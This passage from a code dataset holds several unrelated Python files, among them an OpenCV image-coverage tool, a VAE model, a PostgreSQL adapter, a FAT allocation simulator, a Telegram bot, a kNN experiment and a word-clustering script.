float(self.limiarB.get())\n statistic[0] = f\"{media}\"\n statistic[1] = f\"{desv_pad}\"\n statistic[2] = f\"{self.valor_limiar_lig}\"\n statistic[3] = f\"{self.valor_limiar_bri}\"\n self.estatistic = statistic\n\n self.lCalculos.config(text=f\"Agregado | Ligante | Brilho | Área coberta média | Desv. Pad.:\\n{sum(self.nAgreg)} | {sum(self.nLigan)} | {sum(self.nBrilh)} | {round(media, 2)}% | {round(desv_pad, 2)}\")\n \n self.bGravar.config(state=\"normal\")\n self.bCalcular.config(state=\"disable\")\n\n def gravar(self):\n pasta_armazenar = str(self.ePasta.get()).strip()\n if(len(pasta_armazenar) > 0): #removed and not self.tem_caracter_especial(pasta_armazenar)\n self.ePasta.config(bg=\"#90ee90\")\n img_or = cv2.cvtColor(self.img_o.copy(), cv2.COLOR_RGB2BGR)\n img_ma = cv2.cvtColor(self.img_find_mrc.copy(), cv2.COLOR_RGB2BGR)\n img_li = cv2.cvtColor(self.i_ligante.copy(), cv2.COLOR_RGB2BGR)\n img_br = cv2.cvtColor(self.i_brilho.copy(), cv2.COLOR_RGB2BGR)\n\n legenda = []\n for x in range(len(self.list_contours)):\n legenda.append('')\n \n legenda[0] = 'Media'\n legenda[1] = 'Desv. Pad.'\n legenda[2] = 'Limiar Ligante'\n legenda[3] = 'Limiar Brilho do ligante'\n\n agora = datetime.datetime.now()\n data_hora_formatada = agora.strftime(\"%d-%m-%Y_%H-%M-%S\")\n df = pd.DataFrame({'Id': self.id, 'Pixels Agregados': self.nAgreg, 'Pixels Ligante': self.nLigan, 'Pixels Brilho': self.nBrilh, 'Cobrimento': self.nCobrimento, 'Estatistica': self.estatistic, 'Legenda': legenda})\n \n pasta2 = f\"{pasta_armazenar}/{data_hora_formatada}\"\n\n if not (os.path.exists(pasta2)):\n os.mkdir(pasta2)\n \n df.to_csv(pasta2 + '/data_' + data_hora_formatada + '.csv', index=False)\n\n try:\n cv2.imwrite(pasta2 + '/imageOriginal_' + data_hora_formatada + '.jpg', img_or)\n cv2.imwrite(pasta2 + '/imageMarcada_' + data_hora_formatada + '.jpg', img_ma)\n cv2.imwrite(pasta2 + '/imageLigante_' + data_hora_formatada + '.jpg', img_li)\n cv2.imwrite(pasta2 + '/imageBrilho_' + data_hora_formatada + '.jpg', img_br)\n except:\n self.lCalculos.config(text=\"ERRO AO GRAVAR IMAGEM\")\n else:\n self.ePasta.config(bg=\"#ee9090\")\n\n def contar_pixel(self, contours, i_bin, var_contada):\n i_b = np.zeros(shape=i_bin.shape, dtype=i_bin.dtype)\n var_ = []\n for x in range(len(contours)):\n i_mask = cv2.drawContours(i_b.copy(), contours, x, (255), -1)\n i_mask_inv = 255 - i_mask\n i_contagem = i_bin.copy()\n i_contagem[i_mask_inv == 255] = (0)\n var_.append(cv2.countNonZero(i_contagem))\n \n vars_dict = {1: \"nAgreg\", 2: \"nLigan\"}\n setattr(self, vars_dict.get(var_contada, \"nBrilh\"), var_)\n\n def tem_caracter_especial(self, string):\n pattern = r'[^a-zA-Z0-9\\s]' # Padrão para verificar se há caracteres especiais\n print(bool(re.search(pattern, string)))\n return bool(re.search(pattern, string))\n\nif __name__ == '__main__':\n MainClass()","repo_name":"otavio04/Covered_Area_results","sub_path":"Covered_Area.py","file_name":"Covered_Area.py","file_ext":"py","file_size_in_byte":18594,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"16093539775","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\n# iPhone 6 kostnader\n# http://recode.net/2014/09/23/teardown-shows-apples-iphone-6-cost-at-least-200-to-build/\n\n# koster 216-263 å lage (6+), selger for 749-949\n# bidrag: 533-686 (sykt bra)\n\ndef iphone6plus_recode(memory=128):\n # in dollars\n price_per_gig = 0.42\n cost = {\n \"assembly\": 4.5,\n \"memory\": price_per_gig*memory,\n \"display\": 52.5, # big display + touch\n \"cpu\": 20, # A8 + sensors, MASS produced\n \"sensors\": 22, # nfc + other sensors\n }\n\n # bedre teardown:\n # http://www.techinsights.com/teardown.com/apple-iphone-6/\n return sum(cost.values())\n\ndef iphone6plus():\n \"In dollars\"\n # from techinsights\n # http://www.techinsights.com/teardown.com/apple-iphone-6/\n costs = {\n \"assembly and test\": 11,\n \"supporting materials\": 6,\n \"other\": 34.5,\n \"non-electric\": 18,\n \"power mgmt/audio\": 7,\n \"bb+xcr\": 27.5,\n \"cpu\": 37,\n \"sdram\": 5,\n \"nand\": 9,\n \"connectivity\": 13,\n \"camera\": 17.5,\n \"battery\": 6,\n \"display, touch + glass\": 51,\n }\n return sum(costs.values())\n\ndef our():\n \"In dollars\"\n # from techinsights\n # http://www.techinsights.com/teardown.com/apple-iphone-6/\n costs = {\n \"assembly and test\": 11,\n \"supporting materials\": 6,\n \"other\": 34.5,\n \"non-electric\": 18,\n \"power mgmt/audio\": 7,\n \"bb+xcr\": 27.5, # baseband and transceiver chips\n \"cpu\": 7, # atmega64 price if buy 1000 (industrial!)\n \"sdram\": 1, # minimal need, only buffers,\n # this one (sdram) is 1 gig samsung flash though\n # ram must hold at least 1 picture taken\n # for video rec, streams it, so must be able to hold buffer\n # also need some onboard RAM for minimal OS + keybaord\n \"nand\": 0, # no need for flash\n \"connectivity\": 13, # ?\n \"camera\": 17.5,\n \"battery\": 6,\n \"display, touch + glass\": 51,\n }\n # problemet med denne er de store kostnadene som other, non-electric,\n # bb+xcr\n\n # se også denne som har tallene klar:\n # http://www.iclarified.com/24444/iphone-5-bill-of-materials-estimated-at-16750\n return sum(costs.values())\n\n\nparts = iphone6plus()\nprice = 749\nprint(\"iPhone6+ parts %.2f\" % parts)\nprint(\" price %.2f\" % price)\nprint(\" net %.2f\" % (price-parts))\nprint()\nprint(\"Our:\")\nprint(\"Our parts: %.2f\" % our())\n","repo_name":"cslarsen/ele3701","sub_path":"beregninger/mobile.py","file_name":"mobile.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36379682385","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 29 10:24:43 2019\n\n@author: nsde\n\"\"\"\n\n#%%\nimport torch\nfrom torch import nn\nfrom torch import distributions as D\n\n#%%\nclass singleStd(nn.Module):\n def __init__(self, outputsize):\n super(singleStd, self).__init__()\n self.std = nn.Parameter(torch.tensor(0.02**2))\n self.outputsize = outputsize\n \n def forward(self, z):\n return self.std*torch.ones(*z.shape[:-1], self.outputsize, device=z.device)\n\n#%%\nclass VAE_single(nn.Module):\n def __init__(self, ):\n super(VAE_single, self).__init__()\n self.enc_mu = nn.Sequential(nn.Linear(2, 100), \n nn.ReLU(), \n nn.Linear(100, 2))\n self.enc_std = nn.Sequential(nn.Linear(2, 100), \n nn.ReLU(), \n nn.Linear(100, 2), \n nn.Softplus())\n self.dec_mu = nn.Sequential(nn.Linear(2, 100), \n nn.ReLU(), \n nn.Linear(100, 2))\n self.dec_std = nn.Sequential(singleStd(2),\n nn.Softplus())\n \n def encoder(self, x):\n return self.enc_mu(x), self.enc_std(x)\n \n def decoder(self, z, switch=1.0):\n x_mu, x_std = self.dec_mu(z), self.dec_std(z)\n x_std = switch*x_std + (1-switch)*torch.tensor(0.02**2)\n return x_mu, x_std\n \n def forward(self, x, beta=1.0, switch=1.0, iw_samples=1):\n # Encoder step\n z_mu, z_std = self.encoder(x)\n q_dist = D.Independent(D.Normal(z_mu, z_std), 1)\n z = q_dist.rsample([iw_samples])\n \n # Decoder step\n x_mu, x_std = self.decoder(z, switch)\n p_dist = D.Independent(D.Normal(x_mu, x_std), 1)\n \n # Calculate loss\n prior = D.Independent(D.Normal(torch.zeros_like(z),\n torch.ones_like(z)), 1)\n log_px = p_dist.log_prob(x)\n kl = q_dist.log_prob(z) - prior.log_prob(z)\n elbo = (log_px - beta*kl).mean()\n iw_elbo = elbo.logsumexp(dim=0) - torch.tensor(float(iw_samples)).log()\n \n return iw_elbo.mean(), log_px.mean(), kl.mean(), x_mu[0], x_std[0], z[0], z_mu, z_std","repo_name":"SkafteNicki/vae_variance_funcs","sub_path":"models/vae_single.py","file_name":"vae_single.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1218977651","text":"from __future__ import annotations\n\nimport abc\nimport logging\nfrom typing import (\n ClassVar,\n Generic,\n Sequence,\n TypeVar,\n Union,\n)\n\nimport attr\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects.postgresql.psycopg2 import PGDialect_psycopg2\nfrom sqlalchemy.engine.default import DefaultDialect\nfrom sqlalchemy.sql.base import Executable\n\nfrom dl_constants.enums import UserDataType\nfrom dl_core.connectors.base.query_compiler import QueryCompiler\nfrom dl_core.data_processing.processing.db_base.exec_adapter_base import ProcessorDbExecAdapterBase\nfrom dl_core.data_processing.streaming import AsyncChunkedBase\nfrom dl_core.db.sa_types import make_sa_type\n\nfrom dl_connector_postgresql.core.postgresql_base.type_transformer import PostgreSQLTypeTransformer\n\n\nLOGGER = logging.getLogger(__name__)\n\n_CONN_TV = TypeVar(\"_CONN_TV\")\n\n\n@attr.s\nclass PostgreSQLExecAdapterAsync(Generic[_CONN_TV], ProcessorDbExecAdapterBase, metaclass=abc.ABCMeta): # noqa\n \"\"\"\n PG-CompEng-specific adapter.\n Adds DDL functionality and PostgreSQL specificity to the base DB adapter.\n \"\"\"\n\n _conn: _CONN_TV = attr.ib(kw_only=True)\n _tt: PostgreSQLTypeTransformer = attr.ib(factory=PostgreSQLTypeTransformer, init=False)\n\n _log: ClassVar[logging.Logger] = LOGGER.getChild(\"PostgreSQLExecAdapterAsync\") # type: ignore # TODO: fix\n\n @property\n def dialect(self) -> DefaultDialect:\n # Note: not necessarily psycopg2, but should be close enough\n # (especially for debug-compile).\n return PGDialect_psycopg2()\n\n @abc.abstractmethod\n async def _execute(self, query: Union[str, Executable]) -> None:\n \"\"\"Execute query without (necessarily) fetching data\"\"\"\n\n async def _execute_ddl(self, query: Union[str, Executable]) -> None:\n \"\"\"Execute a DDL statement\"\"\"\n await self._execute(query)\n\n def _make_sa_table(self, table_name: str, names: Sequence[str], user_types: Sequence[UserDataType]) -> sa.Table:\n assert len(names) == len(user_types)\n columns = [\n sa.Column(name=name, type_=make_sa_type(native_type=self._tt.type_user_to_native(user_t=user_t)))\n for name, user_t in zip(names, user_types)\n ]\n return sa.Table(table_name, sa.MetaData(), *columns, prefixes=[\"TEMPORARY\"])\n\n async def create_table(\n self,\n *,\n table_name: str,\n names: Sequence[str],\n user_types: Sequence[UserDataType],\n ) -> None:\n \"\"\"Create table in database\"\"\"\n\n table = self._make_sa_table(table_name=table_name, names=names, user_types=user_types)\n self._log.info(f\"Creating PG processor table {table_name}: {table}\")\n await self._execute_ddl(sa.schema.CreateTable(table))\n\n async def _drop_table(self, table_name: str) -> None:\n await self._execute_ddl(sa.schema.DropTable(sa.table(table_name))) # type: ignore\n\n async def drop_table(self, table_name: str) -> None:\n \"\"\"Drop table in database\"\"\"\n\n self._log.info(f\"Dropping PG processor table {table_name}\")\n await self._drop_table(table_name=table_name)\n\n @abc.abstractmethod\n async def insert_data_into_table(\n self,\n *,\n table_name: str,\n names: Sequence[str],\n user_types: Sequence[UserDataType],\n data: AsyncChunkedBase,\n ) -> None:\n \"\"\",,,\"\"\"\n\n def get_query_compiler(self) -> QueryCompiler:\n return QueryCompiler(dialect=self.dialect)\n","repo_name":"datalens-tech/datalens-backend","sub_path":"lib/dl_compeng_pg/dl_compeng_pg/compeng_pg_base/exec_adapter_base.py","file_name":"exec_adapter_base.py","file_ext":"py","file_size_in_byte":3459,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"54"} +{"seq_id":"7032376937","text":"from keras_segmentation.models.unet import vgg_unet\r\n\r\n\r\nweights = 'corrosionunet.h5'\r\ninput_dir = 'path/to/dir'\r\noutput_dir = 'path/to/dir'\r\nmodel = vgg_unet(n_classes=2 , input_height=512, input_width=512)\r\nmodel.load_weights(weights)\r\n\r\n\r\nmodel.summary()\r\n\r\n\r\nfrom keras_segmentation.predict import predict_multiple\r\n\r\npredict_multiple(model=model, inp_dir=input_dir,out_dir=output_dir )\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"LEERHyun/FinalProposal","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74766498080","text":"'''\ninput = \n 10 => 숫자 카드의 개수\n 6 3 2 10 10 10 -10 -10 7 3 => 숫자 카드\n 8 => 구할 숫자 개수\n 10 9 -5 2 3 4 5 -10 => 구할 숫자 \n'''\n\nn = int(input())\ncards = input().split()\nm = int(input())\nfinding = input().split()\n\ncheck = []\n\nfor i in range(m):\n if finding[i] in cards:\n check.append(cards.count(finding[i]))\n else:\n check.append(0)\n\nprint(*check)\n","repo_name":"ererink/TIL","sub_path":"Algorithm/BAEKJOON/Resolved/10816.py","file_name":"10816.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"ko","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"28182372747","text":"from sys import stdin\n\ninput = stdin.readline\n\nn,m,k = map(int, input().split())\nfriend_price = list(map(int, input().split()))\n\nparent = [i for i in range(n)]\n\ndef solv():\n init()\n if m == 0:\n total = sum(friend_price)\n if k < total:\n print('Oh no')\n else:\n print(total)\n else:\n starts = set(parent)\n total = 0\n visited = [False]*n\n for idx in starts:\n idx = find(idx)\n if not visited[idx]:\n visited[idx] = True\n total += friend_price[idx]\n if k < total:\n print('Oh no')\n return\n print(total)\n\ndef init():\n for _ in range(m):\n a,b = map(int, input().split())\n union(a-1,b-1)\n\ndef find(target):\n if parent[target] == target:\n return target\n else:\n parent[target] = find(parent[target])\n return parent[target]\n\ndef union(a,b):\n a = find(a)\n b = find(b)\n if a != b:\n if friend_price[a] > friend_price[b]:\n parent[a] = b\n else:\n parent[b] = a\n\nsolv()","repo_name":"alsgh9948/Problem-Solving","sub_path":"baekjoon/16562.py","file_name":"16562.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28015070894","text":"from helpers import *\nimport math\nfrom operaciones import *\n\ndef main():\n\n mem_total = memoria()\n print(mem_total, 'KB')\n sector = 64\n sectores = math.floor(mem_total / sector)\n print('Sectores Iniciales: ', sectores)\n archivos = {}\n fat = generar_fat(sectores)\n\n opc = mostrar_menu()\n\n\n while opc != 5:\n if opc==1:\n ingresado, archivos, fat, sectores, msg = ingresar_arch(sectores, sector, archivos, fat)\n if ingresado:\n print(msg)\n else:\n print(msg)\n \n if opc == 2:\n nombre_arch = \" \".join(input('Ingresar nombre del archivo a eliminar: ').split())\n if existe_archivo(archivos, nombre_arch):\n archivos[nombre_arch].print()\n eliminado, fat, sec_liberados = archivos[nombre_arch].eliminar_del_fat(fat)\n if eliminado:\n sectores = sectores + sec_liberados\n del archivos[nombre_arch]\n print('Archivo eliminado exitosamente')\n\n else:\n print('El archivo no existe')\n\n if opc == 3:\n mostrar_fat(archivos, mem_total)\n\n if opc == 4:\n fat, archivos = desfragmentar(fat, archivos)\n\n mem_total = sectores * sector\n #print('Memoria disponible: ', mem_total, ' KB')\n #print('Sectores disponibles: ', sectores)\n opc = mostrar_menu()\n \nmain()\n\n","repo_name":"AlejandroRV02/python-indexed-allocation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70018809762","text":"import telegram\n\n\nLAST_UPDATE_ID = None\n\n\ndef main():\n\n ''' This is the main function that has to be called '''\n\n global LAST_UPDATE_ID\n\n # Telegram Bot Authorization Token\n bot = telegram.Bot('Put your token here')\n\n # This will be our global variable to keep the latest update_id when requesting\n # for updates. It starts with the latest update_id if available.\n try:\n LAST_UPDATE_ID = bot.getUpdates()[-1].update_id\n except IndexError:\n LAST_UPDATE_ID = None\n\n while True:\n fetch_url(bot)\n\n\ndef list_compare(first_list, second_list):\n\n ''' Function to compare two list and return the index of first matched index'''\n\n for word in first_list:\n if word in second_list:\n return second_list.index(word)\n return -1\n\ndef fetch_url(bot):\n global LAST_UPDATE_ID\n\n # Following is a dictionary of commands that the bot can use\n\n commands = {'/help':\"You can add me in any group or text me! I don't have aceess to the group message so you need to call me by my name i.e @lmgtfyou_bot or start your senstence with '/' , I listen to the keyword 'means' \", '/start':'I am always listening to you. Just use magical words'}\n\n magic_words = ['means','mean','/means','/mean']\n\n for update in bot.getUpdates(offset=LAST_UPDATE_ID, timeout=10):\n chat_id = update.message.chat_id\n message = update.message.text.encode('utf-8')\n message_list = message.split()\n\n if(message in commands):\n bot.sendMessage(chat_id=chat_id, text=commands[message])\n LAST_UPDATE_ID = update.update_id + 1\n\n if ( list_compare(magic_words, message_list)!= -1):\n search = message_list[list_compare(magic_words, message_list)-1]\n url='http://lmgtfy.com/?q='+search\n bot.sendMessage(chat_id=chat_id,text=url)\n LAST_UPDATE_ID = update.update_id + 1\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"farhaanbukhsh/Telegram-Bots","sub_path":"lmgtfy_bot.py","file_name":"lmgtfy_bot.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"32203040498","text":"class NumbersToWords(object):\n\tdef __init__(self, context=''):\n\t\tself.ONES_TENS = \"one two three four five six seven eight nine ten eleven twelve thirteen fourteen fifteen sixteen seventeen eighteen nineteen twenty\".split(\" \")\n\t\tself.MULTIPLES_OF_TEN = \"ten twenty thirty fourty fifty sixty seventy eighty ninty hundred\".split(\" \")\n\t\tself.WORDS = \"hundred thousand million billion trillion gazillion\".split(\" \")\n\t\tself.context = context\n\n\tdef convert_segment(self, number):\n\t\toutput = \"\"\n\t\tnumber = int(number)\n\t\tif number <= 0:\n\t\t\toutput = \"\"\n\t\telse:\n\t\t\tif number <= 20:\n\t\t\t\toutput = self.ONES_TENS[number-1].capitalize()\n\t\t\telif number <= 99:\n\t\t\t\toutput = self.MULTIPLES_OF_TEN[number/10-1].capitalize()\n\t\t\t\tif number%10 != 0:\n\t\t\t\t\toutput += \" \" + self.ONES_TENS[number%10-1].capitalize()\n\t\t\telif number <= 999:\n\t\t\t\toutput = self.ONES_TENS[number/100-1].capitalize()\n\t\t\t\toutput += \" \" + self.WORDS[0].capitalize()\n\t\t\t\tif number%100 != 0:\n\t\t\t\t\toutput += \" and \" + self.convert_segment(number%100)\n\t\treturn output\n\n\tdef convert(self, number):\n\t\tsegment_output = []\n\t\tnumber_segments = self.make_segments(number)\n\t\tnumber_segments = number_segments[::-1]\n\t\tfor i, segment in enumerate(number_segments):\n\t\t\tif int(segment) > 0:\n\t\t\t\tif i != 0:\n\t\t\t\t\tsegment_output.append(self.convert_segment(segment) + \" \" + self.WORDS[i].capitalize())\n\t\t\t\telse:\n\t\t\t\t\tsegment_output.append(self.convert_segment(segment))\n\t\treturn ', '.join(segment_output[::-1]) + (\" \" + self.context.capitalize() if self.context else \"\")\n\n\tdef make_segments(self, number):\n\t\t# reverse the order of numbers\n\t\tnumber = str(number)[::-1]\n\t\toutput = []\n\t\t# split numbers into segments of 3s\n\t\tfor num in range(0, len(number), 3):\n\t\t\toutput.append(number[num:num+3])\n\t\t# reverse each segment back to normal\n\t\tfor i,v in enumerate(output):\n\t\t\toutput[i] = output[i][::-1]\n\t\t# reverse the order of segments\n\t\treturn output[::-1]","repo_name":"muhanad40/Numbers-To-Words-Python","sub_path":"lib/NumbersToWords.py","file_name":"NumbersToWords.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71183598883","text":"import cv2\r\n\r\ncap = cv2.VideoCapture(0)\r\n\r\nwhile(True):\r\n ret, frame = cap.read()\r\n cv2.imshow('frame', frame)\r\n frame_width = int(cap.get(3))\r\n frame_height = int(cap.get(4))\r\n\r\n size = (frame_width, frame_height)\r\n cv2.VideoWriter('output.avi', cv2.VideoWriter_fourcc(*'MJPG'), 10, size)\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()","repo_name":"tanishkamunot03/Practicals_OSL","sub_path":"practical_4_A.py","file_name":"practical_4_A.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72175394083","text":"from __future__ import division\nimport os\nos.chdir(r'D:\\Haverford\\2017-2018\\Chem 362')\n\nimport pickle, time\nimport numpy as np\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\n\n# Checks if the dimensions of involved arrays are in order\n# Makes it easier to spot mistakes\ndef dims(arg):\n print(np.shape(arg))\n \nkset = [1, 2, 3, 5]\nwith open('cleandata.p', 'rb') as f:\n rawdata0, reality0, Zscore_exempted_cols, coldict, rowdict = pickle.load(f)\n\n# PARAMETERS\nbmin = 500\nbmax = 3000\nbgap = 25\nbset = range(0, bmax - bmin + bgap, bgap)\ntest_size = 0.1\n\ntraintestratio = []\ntimeused = [[] for _ in kset]\n\n# DON'T USE acc, acc3, acc4, acc34 = [[[] for _ in kset]] * 4\n# This is defining a single variable in many names\nacc, acc1, acc2, acc12, acc3, acc4, acc34 = ([[] for _ in kset] for _ in range(7))\n\n# Control set using randomness\naccr, accr1, accr2, accr12, accr3, accr4, accr34 = ([] for _ in range(7))\n\nreality0 = [int(i) for i in reality0]\n\nrawdata = np.array(rawdata0)\nreality = np.array([[n] for n in reality0])\nlabel_dist = [reality0.count(i)/len(reality0) for i in range(1, 5)]\n\nX_train, X_test, Y_train, Y_test = train_test_split(rawdata, reality,\n test_size=test_size,\n random_state=42)\n\nY0_test = np.concatenate(Y_test[:]) # 1D version of Y_test, used for zipping\n\n# FOR SUBSET ACCURACY QUANTIFICATION USE\nfor b in bset:\n \n Xb_train = X_train[:bmin+b, :]\n Yb_train = Y_train[:bmin+b, :]\n\n print(\"The size of the training set is\", bmin + b)\n \n traintotest = (bmin + b)/len(Y_test)\n traintestratio.append(traintotest)\n print(\"The ratio of training set to testing set is\", traintotest)\n \n for k, n_neighbors in enumerate(kset):\n kstart = time.clock()\n \n knn = KNeighborsClassifier(n_neighbors) \n knn.fit(Xb_train, Yb_train)\n pred = knn.predict(X_test)\n \n # Prediction choices?\n _, predcounts = np.unique(pred, return_counts=True)\n if len(predcounts) != 4:\n mask = np.isin(list(range(1, 5)), pred)\n for i in np.where(mask == False):\n predcounts = np.insert(predcounts, i, 1)\n # change to 0 in future, involves amending below\n \n zipcheck = np.column_stack((Y0_test, pred))\n \n right_choices, right_choices_1, right_choices_2, right_choices_1_2, right_choices_3, right_choices_4, right_choices_3_4= [0] * 7\n \n for i, (a, b) in enumerate(zipcheck):\n if a == b:\n right_choices += 1\n if a == b == 1:\n right_choices_1 += 1\n if a == b == 2:\n right_choices_2 += 1\n if a == b == 3:\n right_choices_3 += 1\n if a == b == 4:\n right_choices_4 += 1\n if a in (1, 2) and b in (1, 2):\n right_choices_1_2 += 1\n if a in (3, 4) and b in (3, 4):\n right_choices_3_4 += 1\n \n accuracy = right_choices/len(pred)\n print(\"The predictions are\", accuracy * 100, \"percent correct\")\n \n accuracy_1 = right_choices_1/predcounts[0]\n accuracy_2 = right_choices_2/predcounts[1]\n accuracy_1_2 = right_choices_1_2/(predcounts[0] + predcounts[1])\n accuracy_3 = right_choices_3/predcounts[2]\n accuracy_4 = right_choices_4/predcounts[3]\n accuracy_3_4 = right_choices_3_4/(predcounts[2] + predcounts[3])\n \n acc[k].append(accuracy)\n acc1[k].append(accuracy_1)\n acc2[k].append(accuracy_2)\n acc12[k].append(accuracy_1_2)\n acc3[k].append(accuracy_3)\n acc4[k].append(accuracy_4)\n acc34[k].append(accuracy_3_4)\n \n kend = time.clock()\n timeused[k].append(kend - kstart)\n print(\"The operation took\", kend - kstart, \"to complete\")\n \n # Baselines \n # Weighted randomly generated results are presented as a control group\n pred_random = np.random.choice(np.array(range(1, 5)), int(len(Y_test)), p=label_dist)\n _, predcounts_random = np.unique(pred_random, return_counts=True)\n if len(predcounts_random) != 4:\n print('Divide by zero scenario ahead')\n raise ValueError('For a certain outcome, RNG generates zero appearances')\n \n zipcheck_random = np.column_stack((Y_test, pred_random))\n \n random_choices, random_choices_1, random_choices_2, random_choices_1_2, random_choices_3, random_choices_4, random_choices_3_4= [0] * 7\n \n for i, (a, b) in enumerate(zipcheck_random):\n if a == b:\n random_choices += 1\n if a == b == 1:\n random_choices_1 += 1\n if a == b == 2:\n random_choices_2 += 1\n if a == b == 3:\n random_choices_3 += 1\n if a == b == 4:\n random_choices_4 += 1\n if a in (1, 2) and b in (1, 2):\n random_choices_1_2 += 1\n if a in (3, 4) and b in (3, 4):\n random_choices_3_4 += 1\n \n accuracy_r = random_choices/len(pred_random)\n print(\"The predictions are\", accuracy * 100, \"percent correct\")\n \n accuracy_r1 = random_choices_1/predcounts_random[0]\n accuracy_r2 = random_choices_2/predcounts_random[1]\n accuracy_r1_r2 = random_choices_1_2/(predcounts_random[0] + predcounts_random[1])\n accuracy_r3 = random_choices_3/predcounts_random[2]\n accuracy_r4 = random_choices_4/predcounts_random[3]\n accuracy_r3_r4 = random_choices_3_4/(predcounts_random[2] + predcounts_random[3])\n \n accr.append(accuracy_r)\n accr1.append(accuracy_r1)\n accr2.append(accuracy_r2)\n accr12.append(accuracy_r1_r2)\n accr3.append(accuracy_r3)\n accr4.append(accuracy_r4)\n accr34.append(accuracy_r3_r4)\n \n # Code used for single random benchmark\n \"\"\"\n pred_random = np.reshape(pred_random, (-1, 1))\n accuracy_random = accuracy_score(Y_test, pred_random)\n acc_random.append(accuracy_random)\n \"\"\"\n \n b += bgap\n\naccpack = acc, acc1, acc2, acc12, acc3, acc4, acc34\naccrpack = accr, accr1, accr2, accr12, accr3, accr4, accr34\nplotuse = accpack, accrpack, timeused, bset, kset\n\nwith open('plotdata.p', 'wb') as g:\n g.seek(0)\n g.truncate() # Erase everything before moving forward\n pickle.dump(plotuse,g)","repo_name":"z-q-y/darkrxns","sub_path":"k-Nearest_Neighbors_v1.py","file_name":"k-Nearest_Neighbors_v1.py","file_ext":"py","file_size_in_byte":6485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39900895131","text":"import sys\nfrom operator import itemgetter\nfrom math import log\nimport argparse\nfrom collections import Counter\nfrom morph import Morphology\n\nfrom language import Language\nfrom perplexity import calcPerplexity\n\ndef nlogn(x):\n if x == 0:\n return x\n else:\n return x * log(x)\n\ndef readInputFile(inputFileName):\n \n wordDict = {}\n bigramDict = {}\n \n sys.stderr.write('\\nReading input file...')\n \n for en in open(inputFileName,'r'):\n \n en = en.strip()\n enWords = en.split()\n \n prevWord = ''\n for word in enWords:\n \n if word in wordDict:\n wordDict[word] += 1.0\n else:\n wordDict[word] = 1.0\n\n if prevWord != '':\n if (prevWord, word) in bigramDict:\n bigramDict[(prevWord, word)] += 1.0\n else:\n bigramDict[(prevWord, word)] = 1.0\n prevWord = word\n \n sys.stderr.write(' Complete!\\n')\n return wordDict, bigramDict\n \ndef runOchClustering(lang):\n \n wordsExchanged = 9999\n iterNum = 0\n wordVocabLen = len(lang.wordDict)\n \n #origPerplex, wastePerplex = calcPerplexity(lang, None, None, None, 0)\n origPerplex = 0.0\n \n while ((wordsExchanged > 0.001 * wordVocabLen or iterNum < 10) and wordsExchanged != 0 and iterNum <= 20):\n iterNum += 1\n wordsExchanged = 0\n wordsDone = 0\n \n sys.stderr.write('\\n'+'IterNum: '+str(iterNum)+'\\n'+'Perplexity: '+str(origPerplex)+'\\n')\n \n for (word, val) in sorted(lang.wordDict.items(), key=itemgetter(1), reverse=True):\n # Looping over all the words in the vocabulory\n #for word in sorted(lang.wordDict.keys()):\n origClass = lang.wordToClusDict[word]\n currLeastPerplex = origPerplex\n tempNewClass = origClass\n \n # Try shifting every word to a new cluster and caluculate perplexity\n for possibleNewClass in lang.clusUniCount.keys():\n if possibleNewClass != origClass:\n \n deltaMono = lang.calcTentativePerplex(word, origClass, possibleNewClass)\n possiblePerplex = deltaMono + origPerplex\n \n if possiblePerplex < currLeastPerplex:\n currLeastPerplex = possiblePerplex\n tempNewClass = possibleNewClass\n \n wordsDone += 1\n if wordsDone % 1000 == 0: \n sys.stderr.write(str(wordsDone)+' ')\n \n if tempNewClass != origClass:\n \n wordsExchanged += 1\n lang.updateDistribution(word, origClass, tempNewClass)\n \n origPerplex = currLeastPerplex\n \n sys.stderr.write('\\nwordsExchanged: '+str(wordsExchanged)+'\\n')\n \n return \n \ndef printNewClusters(outputFileName, lang):\n \n outFile = open(outputFileName, 'w')\n \n for clus, wordList in lang.wordsInClusDict.iteritems():\n \n wDict = {}\n for word in wordList:\n wDict[word] = lang.wordDict[word]\n \n for word, val in sorted(wDict.items(), key=itemgetter(1), reverse=True):\n outFile.write(word+'\\t'+str(clus)+'\\n')\n \ndef main(inputFileName, outputFileName, numClusInit, typeClusInit, morphWeight):\n \n # Read the input file and get word counts\n wordDict, bigramDict = readInputFile(inputFileName)\n \n lang = Language(wordDict, bigramDict, numClusInit, typeClusInit)\n #morph = Morphology(lang, morphWeight)\n #lang.setMorphologyObject(morph)\n \n 